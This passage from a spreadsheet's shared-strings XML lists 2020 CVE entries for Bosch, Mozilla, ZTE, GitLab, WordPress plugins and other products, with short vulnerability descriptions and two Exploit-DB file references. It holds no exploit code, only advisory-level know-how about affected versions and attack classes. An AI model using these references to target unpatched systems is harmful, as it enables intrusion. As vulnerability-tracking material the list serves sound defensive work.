    <t>A vulnerability in the web-based management interface of Bosch PRAESIDEO until and including version 4.41 and Bosch PRAESENSA until and including version 1.10 allows an authenticated remote attacker with admin privileges to mount a stored Cross-Site-Scripting (XSS) attack against another user. When the victim logs into the management interface, the stored script code is executed in the context of his browser. A successful exploit would allow an attacker to interact with the management interface with the privileges of the victim. However, as the attacker already needs admin privileges, there is no additional impact on the management interface itself.</t>
  </si>
  <si>
    <t>CVE-2020-6779</t>
  </si>
  <si>
    <t>Use of Hard-coded Credentials in the database of Bosch FSM-2500 server and Bosch FSM-5000 server up to and including version 5.2 allows an unauthenticated remote attacker to log into the database with admin-privileges. This may result in complete compromise of the confidentiality and integrity of the stored data as well as a high availability impact on the database itself. In addition, an attacker may execute arbitrary commands on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-6780</t>
  </si>
  <si>
    <t>Use of Password Hash With Insufficient Computational Effort in the database of Bosch FSM-2500 server and Bosch FSM-5000 server up to and including version 5.2 allows a remote attacker with admin privileges to dump the credentials of other users and possibly recover their plain-text passwords by brute-forcing the MD5 hash.</t>
  </si>
  <si>
    <t>CVE-2020-6781</t>
  </si>
  <si>
    <t>Improper certificate validation for certain connections in the Bosch Smart Home System App for iOS prior to version 9.17.1 potentially allows to intercept video contents by performing a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVE-2020-6785</t>
  </si>
  <si>
    <t>Loading a DLL through an Uncontrolled Search Path Element in Bosch BVMS and BVMS Viewer in versions 10.1.0, 10.0.1, 10.0.0 and 9.0.0 and older potentially allows an attacker to execute arbitrary code on a victim's system. This affects both the installer as well as the installed application. This also affects Bosch DIVAR IP 7000 R2, Bosch DIVAR IP all-in-one 5000 and Bosch DIVAR IP all-in-one 7000 with installers and installed BVMS versions prior to BVMS 10.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-6786</t>
  </si>
  <si>
    <t>Loading a DLL through an Uncontrolled Search Path Element in the Bosch Video Recording Manager installer up to and including version 3.82.0055 for 3.82, up to and including version 3.81.0064 for 3.81 and 3.71 and older potentially allows an attacker to execute arbitrary code on a victim's system. A prerequisite is that the victim is tricked into placing a malicious DLL in the same directory where the installer is started from.</t>
  </si>
  <si>
    <t>CVE-2020-6787</t>
  </si>
  <si>
    <t>Loading a DLL through an Uncontrolled Search Path Element in the Bosch Video Client installer up to and including version 1.7.6.079 potentially allows an attacker to execute arbitrary code on a victim's system. A prerequisite is that the victim is tricked into placing a malicious DLL in the same directory where the installer is started from.</t>
  </si>
  <si>
    <t>CVE-2020-6788</t>
  </si>
  <si>
    <t>Loading a DLL through an Uncontrolled Search Path Element in the Bosch Configuration Manager installer up to and including version 7.21.0078 potentially allows an attacker to execute arbitrary code on a victim's system. A prerequisite is that the victim is tricked into placing a malicious DLL in the same directory where the installer is started from.</t>
  </si>
  <si>
    <t>CVE-2020-6789</t>
  </si>
  <si>
    <t>Loading a DLL through an Uncontrolled Search Path Element in the Bosch Monitor Wall installer up to and including version 10.00.0164 potentially allows an attacker to execute arbitrary code on a victim's system. A prerequisite is that the victim is tricked into placing a malicious DLL in the same directory where the installer is started from.</t>
  </si>
  <si>
    <t>CVE-2020-6790</t>
  </si>
  <si>
    <t>Calling an executable through an Uncontrolled Search Path Element in the Bosch Video Streaming Gateway installer up to and including version 6.45.10 potentially allows an attacker to execute arbitrary code on a victim's system. A prerequisite is that the victim is tricked into placing a malicious exe in the same directory where the installer is started from.</t>
  </si>
  <si>
    <t>CVE-2020-6792</t>
  </si>
  <si>
    <t>When deriving an identifier for an email message, uninitialized memory was used in addition to the message contents. This vulnerability affects Thunderbird &lt; 68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6793</t>
  </si>
  <si>
    <t>When processing an email message with an ill-formed envelope, Thunderbird could read data from a random memory location. This vulnerability affects Thunderbird &lt; 68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6794</t>
  </si>
  <si>
    <t>If a user saved passwords before Thunderbird 60 and then later set a master password, an unencrypted copy of these passwords is still accessible. This is because the older stored password file was not deleted when the data was copied to a new format starting in Thunderbird 60. The new master password is added only on the new file. This could allow the exposure of stored password data outside of user expectations. This vulnerability affects Thunderbird &lt; 68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6795</t>
  </si>
  <si>
    <t>When processing a message that contains multiple S/MIME signatures, a bug in the MIME processing code caused a null pointer dereference, leading to an unexploitable crash. This vulnerability affects Thunderbird &lt; 68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6796</t>
  </si>
  <si>
    <t>A content process could have modified shared memory relating to crash reporting information, crash itself, and cause an out-of-bound write. This could have caused memory corruption and a potentially exploitable crash. This vulnerability affects Firefox &lt; 73 and Firefox &lt; ESR68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6797</t>
  </si>
  <si>
    <t>By downloading a file with the .fileloc extension, a semi-privileged extension could launch an arbitrary application on the user's computer. The attacker is restricted as they are unable to download non-quarantined files or supply command line arguments to the application, limiting the impact. Note: this issue only occurs on Mac OSX. Other operating systems are unaffected. This vulnerability affects Thunderbird &lt; 68.5, Firefox &lt; 73, and Firefox &lt; ESR68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6798</t>
  </si>
  <si>
    <t>If a template tag was used in a select tag, the parser could be confused and allow JavaScript parsing and execution when it should not be allowed. A site that relied on the browser behaving correctly could suffer a cross-site scripting vulnerability as a result. In general, this flaw cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but is potentially a risk in browser or browser-like contexts. This vulnerability affects Thunderbird &lt; 68.5, Firefox &lt; 73, and Firefox &lt; ESR68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6799</t>
  </si>
  <si>
    <t>Command line arguments could have been injected during Firefox invocation as a shell handler for certain unsupported file types. This required Firefox to be configured as the default handler for a given file type and for a file downloaded to be opened in a third party application that insufficiently sanitized URL data. In that situation, clicking a link in the third party application could have been used to retrieve and execute files whose location was supplied through command line arguments. Note: This issue only affects Windows operating systems and when Firefox is configured as the default handler for non-default filetypes. Other operating systems are unaffected. This vulnerability affects Firefox &lt; 73 and Firefox &lt; ESR68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6800</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 72 and Firefox ESR 68.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts. This vulnerability affects Thunderbird &lt; 68.5, Firefox &lt; 73, and Firefox &lt; ESR68.5.</t>
  </si>
  <si>
    <t>CVE-2020-6801</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 72. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 73.</t>
  </si>
  <si>
    <t>CVE-2020-6802</t>
  </si>
  <si>
    <t>In Mozilla Bleach before 3.11, a mutation XSS affects users calling bleach.clean with noscript and a raw tag in the allowed/whitelisted tags option.</t>
  </si>
  <si>
    <t>CVE-2020-6803</t>
  </si>
  <si>
    <t>An open redirect is present on the gateway's login page, which could cause a user to be redirected to a malicious site after logging in.</t>
  </si>
  <si>
    <t>CVE-2020-6804</t>
  </si>
  <si>
    <t>A reflected XSS vulnerability exists within the gateway, allowing an attacker to craft a specialized URL which could steal the user's authentication token. When combined with CVE-2020-6803, an attacker could fully compromise the system.</t>
  </si>
  <si>
    <t>CVE-2020-6805</t>
  </si>
  <si>
    <t>When removing data about an origin whose tab was recently closed, a use-after-free could occur in the Quota manager, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 68.6, Firefox &lt; 74, Firefox &lt; ESR68.6, and Firefox ESR &lt; 68.6.</t>
  </si>
  <si>
    <t>CVE-2020-6806</t>
  </si>
  <si>
    <t>By carefully crafting promise resolutions, it was possible to cause an out-of-bounds read off the end of an array resized during script execution. This could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 68.6, Firefox &lt; 74, Firefox &lt; ESR68.6, and Firefox ESR &lt; 68.6.</t>
  </si>
  <si>
    <t>CVE-2020-6807</t>
  </si>
  <si>
    <t>When a device was changed while a stream was about to be destroyed, the &lt;code&gt;stream-reinit&lt;/code&gt; task may have been executed after the stream was destroyed, causing a use-after-free and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 68.6, Firefox &lt; 74, Firefox &lt; ESR68.6, and Firefox ESR &lt; 68.6.</t>
  </si>
  <si>
    <t>CVE-2020-6808</t>
  </si>
  <si>
    <t>When a JavaScript URL (javascript:) is evaluated and the result is a string, this string is parsed to create an HTML document, which is then presented. Previously, this document's URL (as reported by the document.location property, for example) was the originating javascript: URL which could lead to spoofing attacks; it is now correctly the URL of the originating document. This vulnerability affects Firefox &lt; 74.</t>
  </si>
  <si>
    <t>CVE-2020-6809</t>
  </si>
  <si>
    <t>When a Web Extension had the all-urls permission and made a fetch request with a mode set to 'same-origin', it was possible for the Web Extension to read local files. This vulnerability affects Firefox &lt; 74.</t>
  </si>
  <si>
    <t>CVE-2020-6810</t>
  </si>
  <si>
    <t>After a website had entered fullscreen mode, it could have used a previously opened popup to obscure the notification that indicates the browser is in fullscreen mode. Combined with spoofing the browser chrome, this could have led to confusing the user about the current origin of the page and credential theft or other attacks. This vulnerability affects Firefox &lt; 74.</t>
  </si>
  <si>
    <t>CVE-2020-6811</t>
  </si>
  <si>
    <t>The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP method of a request, which can be controlled by the website. If a user used the 'Copy as Curl' feature and pasted the command into a terminal, it could have resulted in command injection and arbitrary command execution. This vulnerability affects Thunderbird &lt; 68.6, Firefox &lt; 74, Firefox &lt; ESR68.6, and Firefox ESR &lt; 68.6.</t>
  </si>
  <si>
    <t>CVE-2020-6812</t>
  </si>
  <si>
    <t>The first time AirPods are connected to an iPhone, they become named after the user's name by default (e.g. Jane Doe's AirPods.) Websites with camera or microphone permission are able to enumerate device names, disclosing the user's name. To resolve this issue, Firefox added a special case that renames devices containing the substring 'AirPods' to simply 'AirPods'. This vulnerability affects Thunderbird &lt; 68.6, Firefox &lt; 74, Firefox &lt; ESR68.6, and Firefox ESR &lt; 68.6.</t>
  </si>
  <si>
    <t>CVE-2020-6813</t>
  </si>
  <si>
    <t>When protecting CSS blocks with the nonce feature of Content Security Policy, the @import statement in the CSS block could allow an attacker to inject arbitrary styles, bypassing the intent of the Content Security Policy. This vulnerability affects Firefox &lt; 74.</t>
  </si>
  <si>
    <t>CVE-2020-6814</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox and Thunderbird 68.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 68.6, Firefox &lt; 74, Firefox &lt; ESR68.6, and Firefox ESR &lt; 68.6.</t>
  </si>
  <si>
    <t>CVE-2020-6815</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety and script safety bugs present in Firefox 73. Some of these bugs showed evidence of memory corruption or escalation of privilege and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 74.</t>
  </si>
  <si>
    <t>CVE-2020-6816</t>
  </si>
  <si>
    <t>In Mozilla Bleach before 3.12, a mutation XSS in bleach.clean when RCDATA and either svg or math tags are whitelisted and the keyword argument strip=False.</t>
  </si>
  <si>
    <t>CVE-2020-6819</t>
  </si>
  <si>
    <t>Under certain conditions, when running the nsDocShell destructor, a race condition can cause a use-after-free. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Thunderbird &lt; 68.7.0, Firefox &lt; 74.0.1, and Firefox ESR &lt; 68.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-6820</t>
  </si>
  <si>
    <t>Under certain conditions, when handling a ReadableStream, a race condition can cause a use-after-free. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Thunderbird &lt; 68.7.0, Firefox &lt; 74.0.1, and Firefox ESR &lt; 68.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-6821</t>
  </si>
  <si>
    <t>When reading from areas partially or fully outside the source resource with WebGL's &lt;code&gt;copyTexSubImage&lt;/code&gt; method, the specification requires the returned values be zero. Previously, this memory was uninitialized, leading to potentially sensitive data disclosure. This vulnerability affects Thunderbird &lt; 68.7.0, Firefox ESR &lt; 68.7, and Firefox &lt; 75.</t>
  </si>
  <si>
    <t>CVE-2020-6822</t>
  </si>
  <si>
    <t>On 32-bit builds, an out of bounds write could have occurred when processing an image larger than 4 GB in &lt;code&gt;GMPDecodeData&lt;/code&gt;. It is possible that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 68.7.0, Firefox ESR &lt; 68.7, and Firefox &lt; 75.</t>
  </si>
  <si>
    <t>CVE-2020-6823</t>
  </si>
  <si>
    <t>A malicious extension could have called &lt;code&gt;browser.identity.launchWebAuthFlow&lt;/code&gt;, controlling the redirect_uri, and through the Promise returned, obtain the Auth code and gain access to the user's account at the service provider. This vulnerability affects Firefox &lt; 75.</t>
  </si>
  <si>
    <t>CVE-2020-6824</t>
  </si>
  <si>
    <t>Initially, a user opens a Private Browsing Window and generates a password for a site, then closes the Private Browsing Window but leaves Firefox open. Subsequently, if the user had opened a new Private Browsing Window, revisited the same site, and generated a new password - the generated passwords would have been identical, rather than independent. This vulnerability affects Firefox &lt; 75.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-6825</t>
  </si>
  <si>
    <t>Mozilla developers and community members Tyson Smith and Christian Holler reported memory safety bugs present in Firefox 74 and Firefox ESR 68.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 68.7.0, Firefox ESR &lt; 68.7, and Firefox &lt; 75.</t>
  </si>
  <si>
    <t>CVE-2020-6826</t>
  </si>
  <si>
    <t>Mozilla developers Tyson Smith, Bob Clary, and Alexandru Michis reported memory safety bugs present in Firefox 74. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 75.</t>
  </si>
  <si>
    <t>CVE-2020-6827</t>
  </si>
  <si>
    <t>When following a link that opened an intent://-schemed URL, causing a custom tab to be opened, Firefox for Android could be tricked into displaying the incorrect URI. &lt;br&gt; *Note: This issue only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR &lt; 68.7.</t>
  </si>
  <si>
    <t>CVE-2020-6828</t>
  </si>
  <si>
    <t>A malicious Android application could craft an Intent that would have been processed by Firefox for Android and potentially result in a file overwrite in the user's profile directory. One exploitation vector for this would be to supply a user.js file providing arbitrary malicious preference values. Control of arbitrary preferences can lead to sufficient compromise such that it is generally equivalent to arbitrary code execution.&lt;br&gt; *Note: This issue only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR &lt; 68.7.</t>
  </si>
  <si>
    <t>CVE-2020-6829</t>
  </si>
  <si>
    <t>When performing EC scalar point multiplication, the wNAF point multiplication algorithm was used; which leaked partial information about the nonce used during signature generation. Given an electro-magnetic trace of a few signature generations, the private key could have been computed. This vulnerability affects Firefox &lt; 80 and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-6830</t>
  </si>
  <si>
    <t>For native-to-JS bridging, the app requires a unique token to be passed that ensures non-app code can't call the bridging functions. That token was being used for JS-to-native also, but it isn't needed in this case, and its usage was also leaking this token. This vulnerability affects Firefox for iOS &lt; 25.</t>
  </si>
  <si>
    <t>CVE-2020-6831</t>
  </si>
  <si>
    <t>A buffer overflow could occur when parsing and validating SCTP chunks in WebRTC. This could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR &lt; 68.8, Firefox &lt; 76, and Thunderbird &lt; 68.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-6832</t>
  </si>
  <si>
    <t>An issue was discovered in GitLab Enterprise Edition (EE) 8.9.0 through 12.6.1. Using the project import feature, it was possible for someone to obtain issues from private projects.</t>
  </si>
  <si>
    <t>CVE-2020-6833</t>
  </si>
  <si>
    <t>An issue was discovered in GitLab EE 11.3 and later. A GitLab Workhorse bypass could lead to package and file disclosure via request smuggling.</t>
  </si>
  <si>
    <t>CVE-2020-6835</t>
  </si>
  <si>
    <t>An issue was discovered in Bftpd before 5.4. There is a heap-based off-by-one error during file-transfer error checking.</t>
  </si>
  <si>
    <t>CVE-2020-6836</t>
  </si>
  <si>
    <t>grammar-parser.jison in the hot-formula-parser package before 3.0.1 for Node.js is vulnerable to arbitrary code injection. The package fails to sanitize values passed to the parse function and concatenates them in an eval call. If a value of the formula is taken from user-controlled input, it may allow attackers to run arbitrary commands on the server.</t>
  </si>
  <si>
    <t>CVE-2020-6838</t>
  </si>
  <si>
    <t>In mruby 2.1.0, there is a use-after-free in hash_values_at in mrbgems/mruby-hash-ext/src/hash-ext.c.</t>
  </si>
  <si>
    <t>CVE-2020-6839</t>
  </si>
  <si>
    <t>In mruby 2.1.0, there is a stack-based buffer overflow in mrb_str_len_to_dbl in string.c.</t>
  </si>
  <si>
    <t>CVE-2020-6840</t>
  </si>
  <si>
    <t>In mruby 2.1.0, there is a use-after-free in hash_slice in mrbgems/mruby-hash-ext/src/hash-ext.c.</t>
  </si>
  <si>
    <t>CVE-2020-6841</t>
  </si>
  <si>
    <t>D-Link DCH-M225 1.05b01 and earlier devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the spotifyConnect.php userName parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6842</t>
  </si>
  <si>
    <t>D-Link DCH-M225 1.05b01 and earlier devices allow remote authenticated admins to execute arbitrary OS commands via shell metacharacters in the media renderer name.</t>
  </si>
  <si>
    <t>CVE-2020-6843</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus 11.0 Build 11007 allows XSS. This issue was fixed in version 11.0 Build 11010, SD-83959.</t>
  </si>
  <si>
    <t>CVE-2020-6844</t>
  </si>
  <si>
    <t>In TopManage OLK 2020, login CSRF can be chained with another vulnerability in order to takeover admin and user accounts.</t>
  </si>
  <si>
    <t>CVE-2020-6845</t>
  </si>
  <si>
    <t>An issue was discovered in TopManage OLK 2020. As there is no ReadOnly on the Session cookie, the user and admin accounts can be taken over in a DOM-Based XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-6847</t>
  </si>
  <si>
    <t>OpenTrade through 0.2.0 has a DOM-based XSS vulnerability that is executed when an administrator attempts to delete a message that contains JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-6848</t>
  </si>
  <si>
    <t>Axper Vision II 4 devices allow XSS via the DEVICE_NAME (aka Device Name) parameter to the configWebParams.cgi URI.</t>
  </si>
  <si>
    <t>CVE-2020-6849</t>
  </si>
  <si>
    <t>The marketo-forms-and-tracking plugin through 1.0.2 for WordPress allows wp-admin/admin.php?page=marketo_fat CSRF with resultant XSS.</t>
  </si>
  <si>
    <t>CVE-2020-6850</t>
  </si>
  <si>
    <t>Utilities.php in the miniorange-saml-20-single-sign-on plugin before 4.8.84 for WordPress allows XSS via a crafted SAML XML Response to wp-login.php. This is related to the SAMLResponse and RelayState variables, and the Destination parameter of the samlp:Response XML element.</t>
  </si>
  <si>
    <t>CVE-2020-6851</t>
  </si>
  <si>
    <t>OpenJPEG through 2.3.1 has a heap-based buffer overflow in opj_t1_clbl_decode_processor in openjp2/t1.c because of lack of opj_j2k_update_image_dimensions validation.</t>
  </si>
  <si>
    <t>CVE-2020-6852</t>
  </si>
  <si>
    <t>CACAGOO Cloud Storage Intelligent Camera TV-288ZD-2MP with firmware 3.4.2.0919 has weak authentication of TELNET access, leading to root privileges without any password required.</t>
  </si>
  <si>
    <t>CVE-2020-6854</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the JOC Cockpit component of SOS JobScheduler 1.11 and 1.13.2 allows attackers to inject arbitrary web script or HTML via JSON properties available from the REST API.</t>
  </si>
  <si>
    <t>CVE-2020-6855</t>
  </si>
  <si>
    <t>A large or infinite loop vulnerability in the JOC Cockpit component of SOS JobScheduler 1.11 and 1.13.2 allows attackers to parameterize housekeeping jobs in a way that exhausts system resources and results in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-6856</t>
  </si>
  <si>
    <t>An XML External Entity (XEE) vulnerability exists in the JOC Cockpit component of SOS JobScheduler 1.12 and 1.13.2 allows attackers to read files from the server via an entity declaration in any of the XML documents that are used to specify the run-time settings of jobs and orders.</t>
  </si>
  <si>
    <t>CVE-2020-6857</t>
  </si>
  <si>
    <t>CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for local FTP server passwords is hard-coded in the binary.</t>
  </si>
  <si>
    <t>exploits/windows/remote/48363.py</t>
  </si>
  <si>
    <t>Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption</t>
  </si>
  <si>
    <t>CVE-2020-6858</t>
  </si>
  <si>
    <t>Hotels Styx through 1.0.0.beta8 allows HTTP response splitting due to CRLF Injection. This is exploitable if untrusted user input can appear in a response header.</t>
  </si>
  <si>
    <t>CVE-2020-6859</t>
  </si>
  <si>
    <t>Multiple Insecure Direct Object Reference vulnerabilities in includes/core/class-files.php in the Ultimate Member plugin through 2.1.2 for WordPress allow remote attackers to change other users' profiles and cover photos via a modified user_id parameter. This is related to ajax_image_upload and ajax_resize_image.</t>
  </si>
  <si>
    <t>CVE-2020-6860</t>
  </si>
  <si>
    <t>libmysofa 0.9.1 has a stack-based buffer overflow in readDataVar in hdf/dataobject.c during the reading of a header message attribute.</t>
  </si>
  <si>
    <t>CVE-2020-6861</t>
  </si>
  <si>
    <t>A flawed protocol design in the Ledger Monero app before 1.5.1 for Ledger Nano and Ledger S devices allows a local attacker to extract the master spending key by sending crafted messages to this app selected on a PIN-entered Ledger connected to a host PC.</t>
  </si>
  <si>
    <t>CVE-2020-6862</t>
  </si>
  <si>
    <t>V6.0.10P2T2 and V6.0.10P2T5 of F6x2W product are impacted by Information leak vulnerability. Unauthorized users could log in directly to obtain page information without entering a verification code.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48801.sh</t>
  </si>
  <si>
    <t>ZTE Router F602W - Captcha Bypass</t>
  </si>
  <si>
    <t>2020-09-10</t>
  </si>
  <si>
    <t>CVE-2020-6863</t>
  </si>
  <si>
    <t>ZTE E8820V3 router product is impacted by a permission and access control vulnerability. Attackers could use this vulnerability to tamper with DDNS parameters and send DoS attacks on the specified URL.</t>
  </si>
  <si>
    <t>CVE-2020-6864</t>
  </si>
  <si>
    <t>ZTE E8820V3 router product is impacted by an information leak vulnerability. Attackers could use this vulnerability to to gain wireless passwords. After obtaining the wireless password, the attacker could collect information and attack the router.</t>
  </si>
  <si>
    <t>CVE-2020-6865</t>
  </si>
  <si>
    <t>ZTE SDN controller platform is impacted by an information leakage vulnerability. Due to the program's failure to optimize the response of failure to the request, the caller can directly view the internal error code location of the component. Attackers could exploit this vulnerability to obtain sensitive information. This affects: OSCP versions V16.19.10 and V16.19.20.</t>
  </si>
  <si>
    <t>CVE-2020-6866</t>
  </si>
  <si>
    <t>A ZTE product is impacted by a resource management error vulnerability. An attacker could exploit this vulnerability to cause a denial of service by issuing a specific command. This affects: ZXCTN 6500 version V2.10.00R3B87.</t>
  </si>
  <si>
    <t>CVE-2020-6867</t>
  </si>
  <si>
    <t>ZTE's SDON controller is impacted by the resource management error vulnerability. When RPC is frequently called by other applications in the case of mass traffic data in the system, it will result in no response for a long time and memory overflow risk. This affects: ZENIC ONE R22b versions V16.19.10P02SP002 and V16.19.10P02SP005.</t>
  </si>
  <si>
    <t>CVE-2020-6868</t>
  </si>
  <si>
    <t>There is an input validation vulnerability in a PON terminal product of ZTE, which supports the creation of WAN connections through WEB management pages. The front-end limits the length of the WAN connection name that is created, but the HTTP proxy is available to be used to bypass the limitation. An attacker can exploit the vulnerability to tamper with the parameter value. This affects: ZTE F680 V9.0.10P1N6</t>
  </si>
  <si>
    <t>CVE-2020-6869</t>
  </si>
  <si>
    <t>All versions up to 10.06 of ZTEMarket APK are impacted by an information leak vulnerability. Due to Activity Component exposure users can exploit this vulnerability to get the private cookie and execute silent installation.</t>
  </si>
  <si>
    <t>CVE-2020-6870</t>
  </si>
  <si>
    <t>The version V12.17.20T115 of ZTE U31R20 product is impacted by a design error vulnerability. An attacker could exploit the vulnerability to log in to the FTP server to tamper with the password, and illegally download, modify, upload, or delete files, causing improper operation of the network management system and equipment. This affects: NetNumenU31R20 V12.17.20T115</t>
  </si>
  <si>
    <t>CVE-2020-6871</t>
  </si>
  <si>
    <t>The server management software module of ZTE has an authentication issue vulnerability, which allows users to skip the authentication of the server and execute some commands for high-level users. This affects: &lt;R5300G4V03.08.0100/V03.07.0300/V03.07.0200/V03.07.0108/V03.07.0100/V03.05.0047/V03.05.0046/V03.05.0045/V03.05.0044/V03.05.0043/V03.05.0040/V03.04.0020;R8500G4V03.07.0103/V03.07.0101/V03.06.0100/V03.05.0400/V03.05.0020;R5500G4V03.08.0100/V03.07.0200/V03.07.0100/V03.06.0100&gt;</t>
  </si>
  <si>
    <t>CVE-2020-6872</t>
  </si>
  <si>
    <t>The server management software module of ZTE has a storage XSS vulnerability. The attacker inserts some attack codes through the foreground login page, which will cause the user to execute the predefined malicious script in the browser. This affects &lt;R5300G4V03.08.0100/V03.07.0300/V03.07.0200/V03.07.0108/V03.07.0100/V03.05.0047/V03.05.0046/V03.05.0045/V03.05.0044/V03.05.0043/V03.05.0040/V03.04.0020;R8500G4V03.07.0103/V03.07.0101/V03.06.0100/V03.05.0400/V03.05.0020;R5500G4V03.08.0100/V03.07.0200/V03.07.0100/V03.06.0100&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-6873</t>
  </si>
  <si>
    <t>A ZTE product has a DoS vulnerability. Because the equipment couldn’t distinguish the attack packets and normal packets with valid http links, the remote attackers could use this vulnerability to cause the equipment WEB/TELNET module denial of service and make the equipment be out of management. This affects: ZXR10 2800-4_ALMPUFB(LOW), all versions up to V3.00.40.</t>
  </si>
  <si>
    <t>CVE-2020-6874</t>
  </si>
  <si>
    <t>A ZTE product is impacted by the cryptographic issues vulnerability. The encryption algorithm is not properly used, so remote attackers could use this vulnerability for account credential enumeration attack or brute-force attack for password guessing. This affects: ZXIPTV, ZXIPTV-WEB-PV5.09.08.04.</t>
  </si>
  <si>
    <t>CVE-2020-6875</t>
  </si>
  <si>
    <t>A ZTE product is impacted by the improper access control vulnerability. Due to lack of an authentication protection mechanism in the program, attackers could use this vulnerability to gain access right through brute-force attacks. This affects: &lt;ZXONE 19700 SNPE&gt;&lt;ZXONE8700V1.40R2B13_SNPE&gt;</t>
  </si>
  <si>
    <t>CVE-2020-6876</t>
  </si>
  <si>
    <t>A ZTE product is impacted by an XSS vulnerability. The vulnerability is caused by the lack of correct verification of client data in the WEB module. By inserting malicious scripts into the web module, a remote attacker could trigger an XSS attack when the user browses the web page. Then the attacker could use the vulnerability to steal user cookies or destroy the page structure. This affects: eVDC ZXCLOUD-iROSV6.03.04</t>
  </si>
  <si>
    <t>CVE-2020-6877</t>
  </si>
  <si>
    <t>A ZTE product is impacted by an information leak vulnerability. An attacker could use this vulnerability to obtain the authentication password of the handheld terminal and access the device illegally for operation. This affects: ZXA10 eODN V2.3P2T1</t>
  </si>
  <si>
    <t>CVE-2020-6879</t>
  </si>
  <si>
    <t>Some ZTE devices have input verification vulnerabilities. The devices support configuring a static prefix through the web management page. The restriction of the front-end code can be bypassed by constructing a POST request message and sending the request to the creation of a static routing rule configuration interface. The WEB service backend fails to effectively verify the abnormal input. As a result, the attacker can successfully use the vulnerability to tamper parameter values. This affects: ZXHN Z500 V1.0.0.2B1.1000 and ZXHN F670L V1.1.10P1N2E. This is fixed in ZXHN Z500 V1.0.1.1B1.1000 and ZXHN F670L V1.1.10P2N2.</t>
  </si>
  <si>
    <t>CVE-2020-6880</t>
  </si>
  <si>
    <t>A ZXELINK wireless controller has a SQL injection vulnerability. A remote attacker does not need to log in. By sending malicious SQL statements, because the device does not properly filter parameters, successful use can obtain management rights. This affects: ZXV10 W908 all versions before MIPS_A_1022IPV6R3T6P7Y20.</t>
  </si>
  <si>
    <t>CVE-2020-6881</t>
  </si>
  <si>
    <t>ZTE E8810/E8820/E8822 series routers have an MQTT DoS vulnerability, which is caused by the failure of the device to verify the validity of abnormal messages. A remote attacker could connect to the MQTT server and send an MQTT exception message to the specified device, which will cause the device to deny service. This affects:&lt;ZXHN E8810, ZXHN E8820, ZXHN E8822&gt;&lt;E8810 V1.0.26, E8810 V2.0.1, E8820 V1.1.3L, E8820 V2.0.13, E8822 V2.0.13&gt;</t>
  </si>
  <si>
    <t>CVE-2020-6882</t>
  </si>
  <si>
    <t>ZTE E8810/E8820/E8822 series routers have an information leak vulnerability, which is caused by hard-coded MQTT service access credentials on the device. The remote attacker could use this credential to connect to the MQTT server, so as to obtain information about other devices by sending specific topics. This affects:&lt;ZXHN E8810, ZXHN E8820, ZXHN E8822&gt;&lt;E8810 V1.0.26, E8810 V2.0.1, E8820 V1.1.3L, E8820 V2.0.13, E8822 V2.0.13&gt;</t>
  </si>
  <si>
    <t>CVE-2020-6917</t>
  </si>
  <si>
    <t>Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software.</t>
  </si>
  <si>
    <t>CVE-2020-6918</t>
  </si>
  <si>
    <t>CVE-2020-6919</t>
  </si>
  <si>
    <t>CVE-2020-6920</t>
  </si>
  <si>
    <t>CVE-2020-6921</t>
  </si>
  <si>
    <t>CVE-2020-6922</t>
  </si>
